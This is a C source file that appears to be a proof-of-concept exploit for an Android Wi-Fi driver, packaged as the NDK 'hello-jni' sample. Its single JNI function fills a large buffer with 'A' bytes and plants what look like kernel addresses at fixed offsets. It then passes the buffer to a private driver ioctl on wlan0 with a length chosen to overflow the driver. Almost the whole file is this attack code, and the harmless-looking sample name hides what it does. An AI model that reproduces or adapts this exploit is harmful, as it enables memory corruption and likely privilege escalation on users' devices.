/*
 * Copyright (C) 2009 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 *
 */
#include <jni.h>

#include <fcntl.h>
#include <string.h>
#include <stdint.h>

#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/select.h>
#include <sys/socket.h>

static char log_buffer[4096] = {0};

#define LOG(x) strcat(log_buffer, (x))

enum PRIV_IOCTL {
    IOCTL_SET_INT = 0x8be0,
    IOCTL_GET_INT,
    IOCTL_SET_ADDRESS,
    IOCTL_GET_ADDRESS,
    IOCTL_SET_STR,
    IOCTL_GET_STR,
    IOCTL_SET_KEY,
    IOCTL_GET_KEY,
    IOCTL_SET_STRUCT,
    IOCTL_GET_STRUCT,
    IOCTL_SET_STRUCT_FOR_EM,
    IOCTL_SET_INTS,
    IOCTL_GET_INTS,
    IOCTL_SET_STRING
};

enum PRIV_CMD {
    CMD_REG_DOMAIN,
    CMD_BEACON_PERIOD,
    CMD_ADHOC_MODE,
    CMD_CHECKSUM_OFFLOAD,
    CMD_ROAMING,
    CMD_VOIP_DELAY,
    CMD_POWER_MODE,
    CMD_WMM_PS,
    CMD_BT_COEXIST,
    CMD_GPIO2_MODE,
    CMD_CUSTOM_SET_PTA,
    CMD_CUSTOM_CONTINUOUS_POLL,
    CMD_CUSTOM_SINGLE_ANTENNA,
    CMD_CUSTOM_BWCS_CMD,
    CMD_CUSTOM_DISABLE_BEACON_DETECTION,
    CMD_OID,
    CMD_SEC_MSG_OID,
    CMD_TEST_MODE,
    CMD_TEST_CMD,
    CMD_ACCESS_MCR,
    CMD_SW_CTRL,
    CMD_SEC_CHECK_OID,
    CMD_WSC_PROBE_REQ,
    CMD_P2P_VERSION,
    CMD_GET_CH_LIST,
    CMD_SET_TX_POWER,
    CMD_BAND_CONFIG,
    CMD_DUMP_MEM,
    CMD_P2P_MODE,
    CMD_GET_BUILD_DATE_CODE,
    CMD_GET_DEBUG_CODE,
};

struct ioctl_data {
    char     name[16];
    void*    pointer;
    uint16_t length;
    uint16_t flags;
};

#define OFFSET1 0x1310
#define OFFSET2 0x13f0
#define OFFSET3 (OFFSET2 + 0x94)

jstring
Java_com_example_hellojni_HelloJni_stringFromJNI( JNIEnv* env,
                                                  jobject thiz )
{
    int fd = -1;
    int result = 0;

    memset(log_buffer, 0, sizeof(log_buffer));

    do {
        struct ioctl_data arg = {0};
        char buffer[0xffff];
        int *ptr = (int*)buffer;
        int i = 0;

        memset(buffer, 'A', sizeof(buffer));
        *((int*)&buffer[OFFSET1 - 4]) = 0x40404040;
        *((int*)&buffer[OFFSET2 - 4]) = 0xc0cadc88;
        *((int*)&buffer[OFFSET3 - 4]) = 0xc0cadc90;

        fd = socket(AF_INET, SOCK_STREAM, 0);
        if (fd < 0) {
            LOG("[!] socket creation failed!\n");
            break;
        }

        strcpy(arg.name, "wlan0");
        arg.flags = CMD_SW_CTRL;
        arg.pointer = buffer;
        arg.length = OFFSET3;

        result = ioctl(fd, IOCTL_GET_STRUCT, &arg);
        if (result < 0) {
            LOG("[!] socket ioctl failed!\n");
        }

        close(fd);

    } while (0);

    return (*env)->NewStringUTF(env, log_buffer);
}
